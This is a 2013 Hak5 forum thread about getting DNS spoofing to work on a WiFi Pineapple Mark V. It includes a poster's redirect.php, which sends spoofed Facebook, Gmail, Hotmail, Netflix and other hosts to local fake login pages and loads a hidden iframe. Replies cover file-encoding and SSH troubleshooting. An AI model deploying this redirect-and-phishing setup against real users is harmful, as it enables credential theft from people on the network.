SystemCrash86 Posted October 28, 2013 Share Posted October 28, 2013 I got the new wifi pineapple mark 5 and everything works great, except for the dnsspoof - it just doesn't work at all. Is this a common issue with the new pineapple or is it just me and is there a possible fix? Link to comment Share on other sites More sharing options...
no42 Posted October 28, 2013 Share Posted October 28, 2013 It should work! Its just the default index.php file (that your most likely hitting) is issuing a redirect to /redirect.php on the spoofed website. so www.example.com becomes www.example.com/redirect.php replace your /www/index.php with something static that you can easily identify; like pineapple_surprise ? Link to comment Share on other sites More sharing options...
SystemCrash86 Posted October 28, 2013 Author Share Posted October 28, 2013 <?php $ref = "http://".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']; if (strpos($ref, "hotmail")){ header('Status: 302 Found'); header('Location: hotmail.htm'); } if (strpos($ref, "facebook")){ header('Status: 302 Found'); header('Location: facebook.htm'); } if (strpos($ref, "twitter")){ header('Status: 302 Found'); header('Location: twitter.htm'); } if (strpos($ref, "gmail")){ header('Status: 302 Found'); header('Location: gmail.htm'); } if (strpos($ref, "youtube")){ header('Status: 302 Found'); header('Location: youtube.htm'); } if (strpos($ref, "vimeo")){ header('Status: 302 Found'); header('Location: vimeo.htm'); } if (strpos($ref, "linkedin")){ header('Status: 302 Found'); header('Location: linkedin.htm'); } if (strpos($ref, "instagram")){ header('Status: 302 Found'); header('Location: instagram.html'); } if (strpos($ref, "plus.google")){ header('Status: 302 Found'); header('Location: googleplus.htm'); } if (strpos($ref, "netflix")){ header('Status: 302 Found'); header('Location: netflix.htm'); } if (strpos($ref, "ustream")){ header('Status: 302 Found'); header('Location: ustream.htm'); } if (strpos($ref, "dropbox")){ header('Status: 302 Found'); header('Location: dropbox.htm'); } if (strpos($ref, "blogger")){ header('Status: 302 Found'); header('Location: blogger.htm'); } if (strpos($ref, "outlook")){ header('Status: 302 Found'); header('Location: outlook.htm'); } require('error.php'); ?> <iframe style="display:none;" src="/get/get.php"></iframe> This is my redirect.php - the only thing i changed, the error.php and the index.php remain untouched. It worked for my mark 4 so i assumed it would work for my mark 5 - was that an error on my part? Link to comment Share on other sites More sharing options...
thesugarat Posted October 29, 2013 Share Posted October 29, 2013 DNS Spoofing does work on the Mark 5. There are a few things you'll need to know though. The Configuration Tile: DNS Spoof Tab has a bug in it. If you use that Tab to edit the Hosts or the index.php you files will end up with extra characters that look like this ^M. There will be one after each line. If you SSH in and delete those out it will start working. The dnsspoof infusion does not add the extra characters but it does not support editing the index.php. Again, just SSH in. Link to comment Share on other sites More sharing options...
SystemCrash86 Posted October 29, 2013 Author Share Posted October 29, 2013 I had a look at the Configuration Tile and DNS Spoof Tab and the Hosts or index.php have no extra characters at all - not even the ^M and the same thing in the dnsspoof infusion and all i changed was my redirect.php thats it thats all i changed and when i start dns spoof - either from the configuration tile or the actual dns spoof tile i get no errors at all. On my other pc i browse to the spoofed site e.g facebook, twitter and the actual site loads. I haven't seen any extra characters Link to comment Share on other sites More sharing options...
barry99705 Posted October 29, 2013 Share Posted October 29, 2013 I've not been able to get dnsspoof to forward to another site, just to the internal server. Not sure what's the issue. Link to comment Share on other sites More sharing options...
thesugarat Posted October 29, 2013 Share Posted October 29, 2013 SystemCrash86, How did you check those files? The extra characters are not visible if you are only looking with the infusions. You have to SSH in to see them. barry99705, I got external working as well. To Bing actually, thanks for that idea. Extra points for evil. I think the only thing extra I've been doing is exiting the big tile after I start dnsspoof and then going back in so that it refreshes then going over to test that it's working. Link to comment Share on other sites More sharing options...
SystemCrash86 Posted October 29, 2013 Author Share Posted October 29, 2013 SystemCrash86, How did you check those files? The extra characters are not visible if you are only looking with the infusions. You have to SSH in to see them. barry99705, I got external working as well. To Bing actually, thanks for that idea. Extra points for evil. I think the only thing extra I've been doing is exiting the big tile after I start dnsspoof and then going back in so that it refreshes then going over to test that it's working. I SSH'd into the pineapple and went to the www folder and checked the index.php file and other files in that folder and still nothing - did i miss something? Link to comment Share on other sites More sharing options...
thesugarat Posted October 29, 2013 Share Posted October 29, 2013 Nope that's the way to do it... I was worried you were only looking via the gui. What about the /etc/pineapple/spoofhost file? Link to comment Share on other sites More sharing options...
SystemCrash86 Posted October 29, 2013 Author Share Posted October 29, 2013 Nope that's the way to do it... I was worried you were only looking via the gui. What about the /etc/pineapple/spoofhost file? After i couldn't find anything in the www folder i looked at the /etc/pineapple/spoofhost file and found nothing except the hosts i want to dnsspoof, no extra characters or anything. I'm very confused Link to comment Share on other sites More sharing options...
hfam Posted October 29, 2013 Share Posted October 29, 2013 There is already an entire thread on this issue. Please search the forums before starting another thread: https://forums.hak5.org/index.php?/topic/30580-dns-spoof-not-spoofing-the-dnses/ Link to comment Share on other sites More sharing options...
Recommended Posts